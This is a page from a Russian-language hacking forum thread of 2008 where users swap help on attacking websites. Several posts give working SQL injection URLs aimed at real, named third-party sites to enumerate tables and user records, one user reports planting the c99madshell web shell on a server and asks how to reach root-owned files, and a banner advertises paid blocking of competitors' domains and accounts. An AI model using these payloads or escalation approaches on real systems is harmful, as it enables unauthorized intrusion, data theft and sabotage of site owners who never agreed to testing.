УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 145 из 2438

145

Опции темы

Поиск в этой теме

Опции просмотра

#1441

29.03.2008, 18:56

Jokester

Members of Antichat - Level 5

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

Я не понял вопрос по какой базе? Мой пример для MySQL конечно не катит

#1442

29.03.2008, 18:58

Dimi4

Reservists Of Antichat - Level 6

Регистрация: 19.03.2007

Сообщений: 953

Провел на форуме:
7617458

Репутация: 3965

Отправить сообщение для Dimi4 с помощью ICQ

Вопросик возник.. е.
возможно ли через скуль багу, методом insert into
сменить пароль админа из другой базы.?
Зависит ли ето только от прав пользователя?

__________________

BlackHat.

MoDL

#1443

29.03.2008, 19:40

Spaise

Познающий

Регистрация: 21.03.2008

Сообщений: 39

Провел на форуме:
99208

Репутация: 21

Цитата:

Сообщение от Dimi4

insert into - это добавление, а сменить это апдейт.

Цитата:

Сообщение от jokester

Я не понял вопрос по какой базе? Мой пример для MySQL конечно не катит

Мой вопрос был по MySQL и он катит, но как blackybr сказал, только не в инжекте.

#1444

29.03.2008, 20:08

heks

Постоянный

Регистрация: 24.08.2007

Сообщений: 474

Провел на форуме:
1484154

Репутация: 126

Отправить сообщение для heks с помощью ICQ

на одном сайте в исходниках страницы есть такая сторочка
if(eregi("[^a-z0-9_-]",$_GET['f']) || eregi("[^a-z0-9_-]",$_GET['p'])){header ("Location: index.php?error&".SID); exit;}
могу ли я использовать для записишела в php не силен сам предполагаю что нельзя хот яи не уверен

#1445

29.03.2008, 20:13

d_x

Reservists Of Antichat - Level 6

Регистрация: 25.03.2008

Сообщений: 670

Провел на форуме:
4137635

Репутация: 2407

Никак нельзя, этот код просто проверяет по регулярным выражениям значения входящих переменных и в случае несоответствия шаблону выдаёт редирект, видимо, на страницу с ошибкой.

#1446

29.03.2008, 22:41

mr.The

Познавший АНТИЧАТ

Регистрация: 30.04.2007

Сообщений: 1,206

Провел на форуме:
4778940

Репутация: 1257

Отправить сообщение для mr.The с помощью ICQ

нашел название таблицы. а при подставновкке выдаёт ошибку.
нашел вот так http://www.suas.ru/news/show.php?id=-1+union+select+1,table_name,3,4,5,table_schema,7,8 ,9,10+from+information_schema.tables+limit+41,1/*

подставил сюда http://www.suas.ru/news/show.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10+from+ru_suas_r eg_users/* и ошибка =\

#1447

29.03.2008, 22:50

d_x

Reservists Of Antichat - Level 6

Регистрация: 25.03.2008

Сообщений: 670

Провел на форуме:
4137635

Репутация: 2407

В этой таблице нет ни одной записи просто, пустая она:

http://www.suas.ru/news/show.php?id=-1+union+select+1,2,3,4,5,count(1),7,8,9,10%20from% 20ru_suas_reg_users/*

#1448

29.03.2008, 23:04

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

Цитата:

Сообщение от ReVOLVeR

d_x b b и остальные тоже пустые???
таблица не в этой бд...

Советую в дальнейшем не заниматься телепатией, а посмотреть на происходящие вещи, т.е. сначала посмотреть ссылки которые дали, а потом постить

__________________
Карфаген должен быть разрушен...

#1449

29.03.2008, 23:59

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Отправить сообщение для Велемир с помощью ICQ

http://www.laptopshowcase.co.uk/suppliers.php?id=-2+group+by+6+union+select+1,2,3,4,5,6,7,8,9+from+s uppliers или products/*

Чёт у мя тут не получается)).В таблицах Suppliers, Downloads, Products есть столбцы name и id. Вбиваю их,пишет Suppliers not found. Значит ли это, что их нету ?)). Другие столбцы перебирать не стал)

http://www.laptopshowcase.co.uk/suppliers.php?id=-2+group+by+6+union+select+1,2,3,4,5,6,7,8,9/*

P.S. Подставляя вместо 3 что-либо, пытаться угадать ? Если есть что...

Linux exploit

#1450

30.03.2008, 00:26

fervex

Новичок

Регистрация: 12.11.2007

Сообщений: 25

Провел на форуме:
36633

Репутация: 3

Linux exploit

Здравствуйте!

я ламер, но получилось залить шелл c99madshell на сервер под Software: Apache/2.0.55 (Ubuntu) mod_ssl/2.0.55 OpenSSL/0.9.8a. PHP/5.1.2 Linux webserver2 2.6.15-26-server

Нет доступа к файлам, у которых Owner root/adm
Есть доступ к root/root и root/www-data

Скажите, как получить к root/adm файлам доступ?

Посоветуйте, где что почитать нужно по этой теме?

Спасибо!

Страница 145 из 2438

145

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Сценарии/CMF/СMS	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход